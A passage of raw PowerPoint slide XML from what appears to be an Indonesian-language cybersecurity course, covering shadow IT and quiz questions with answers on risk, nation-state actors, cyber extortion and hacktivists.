            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persetujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>departemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> shadow IT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperparah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjamurnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mobile yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Shadow IT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menciptakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak-pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="945137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D" dirty="0" err="1"/>
              <a:t>Manakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Risk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kombinasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>likelihood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah? Aktor negara-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bangsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> negara lain? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>False</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Nation-state actors juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>swasta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kritis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> negara lain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangkapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> prompt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda. Email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyarankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghubungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsultasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> guna </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seharusnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengkategorikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Cybercriminal / Extortion (Blackmail), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>extortion (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pemerasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>cyber extortion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>ransom without malware, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Motivasinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>finansial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekadar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>politik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimotivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keinginan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>politik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Hacktivist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Hacktivists </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> demi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>politik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> uang.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
